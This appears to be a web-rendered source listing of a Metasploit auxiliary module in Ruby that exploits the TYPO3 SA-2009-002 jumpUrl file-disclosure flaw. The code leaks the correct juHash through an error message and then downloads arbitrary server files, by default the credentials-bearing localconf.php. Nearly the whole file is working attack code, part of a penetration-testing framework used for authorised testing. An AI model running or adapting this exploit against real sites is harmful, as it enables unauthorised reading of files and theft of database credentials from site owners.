root / modules / auxiliary / admin / http / typo3_sa_2009_002.rb @ master
History | View | Annotate | Download (3.1 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# Framework web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/framework/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Auxiliary |
| 15 |
|
| 16 |
include Msf::Exploit::Remote::HttpClient |
| 17 |
|
| 18 |
def initialize(info = {}) |
| 19 |
super(update_info(info,
|
| 20 |
'Name' => 'Typo3 sa-2009-002 File Disclosure', |
| 21 |
'Description' => %q{ |
| 22 |
This module exploits a file disclosure vulnerability in the jumpUrl mechanism of |
| 23 |
Typo3. This flaw can be used to read any file that the web server user account has |
| 24 |
access to. |
| 25 |
|
| 26 |
},
|
| 27 |
'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ], |
| 28 |
'License' => MSF_LICENSE, |
| 29 |
'Version' => '$Revision$', |
| 30 |
'References' =>
|
| 31 |
[ |
| 32 |
['OSVDB', '52048'], |
| 33 |
['CVE', '2009-0815'], |
| 34 |
['URL', 'http://secunia.com/advisories/33829/'], |
| 35 |
['URL', 'http://www.exploit-db.com/exploits/8038/'], |
| 36 |
['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/'], |
| 37 |
], |
| 38 |
'DisclosureDate' => 'Feb 10 2009', |
| 39 |
'Actions' =>
|
| 40 |
[ |
| 41 |
['Download']
|
| 42 |
], |
| 43 |
'DefaultAction' => 'Download' |
| 44 |
)) |
| 45 |
|
| 46 |
register_options( |
| 47 |
[ |
| 48 |
OptString.new('URI', [true, "Typo3 Path", "/"]), |
| 49 |
OptString.new('RFILE', [true, "The remote file to download", 'typo3conf/localconf.php']), |
| 50 |
OptString.new('LFILE',[true, "The local filename to store the data", "localconf.php"]), |
| 51 |
], self.class)
|
| 52 |
end
|
| 53 |
|
| 54 |
def run |
| 55 |
print_status("Establishing a connection to the target...")
|
| 56 |
|
| 57 |
error_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&locationData=1:" |
| 58 |
ju_hash = nil
|
| 59 |
|
| 60 |
res = send_request_raw({
|
| 61 |
'uri' => error_uri,
|
| 62 |
'method' => 'GET', |
| 63 |
'headers' =>
|
| 64 |
{
|
| 65 |
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', |
| 66 |
'Connection' => 'Close', |
| 67 |
} |
| 68 |
}, 25)
|
| 69 |
|
| 70 |
if (res and res.message == "OK") |
| 71 |
res.body =~ /jumpurl Secure: Calculated juHash, ((\w)+), did not match the submitted juHash./
|
| 72 |
|
| 73 |
if $1.nil? |
| 74 |
print_error("Error while getting juHash. Maybe the version is already patched...")
|
| 75 |
return
|
| 76 |
end
|
| 77 |
|
| 78 |
ju_hash = $1
|
| 79 |
print_status("Getting juHash from error message: #{ju_hash}")
|
| 80 |
|
| 81 |
else
|
| 82 |
print_error("No response from the server.")
|
| 83 |
return
|
| 84 |
end
|
| 85 |
|
| 86 |
|
| 87 |
file_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&juHash=#{ju_hash}&locationData=1:" |
| 88 |
print_status("Trying to get #{datastore['RFILE']}.")
|
| 89 |
|
| 90 |
file = send_request_raw({
|
| 91 |
'uri' => file_uri,
|
| 92 |
'method' => 'GET', |
| 93 |
'headers' =>
|
| 94 |
{
|
| 95 |
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', |
| 96 |
'Connection' => 'Close', |
| 97 |
} |
| 98 |
},25)
|
| 99 |
|
| 100 |
if (file and file.message = "OK") |
| 101 |
if file.body == 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!' |
| 102 |
print_error("File #{datastore['RFILE']} does not exist.")
|
| 103 |
return
|
| 104 |
end
|
| 105 |
|
| 106 |
print_status("Writing local file #{datastore['LFILE']}.")
|
| 107 |
open(datastore['LFILE'],'w') {|f| f << file.body } |
| 108 |
else
|
| 109 |
print_error("Error while getting file.")
|
| 110 |
end
|
| 111 |
|
| 112 |
end
|
| 113 |
end
|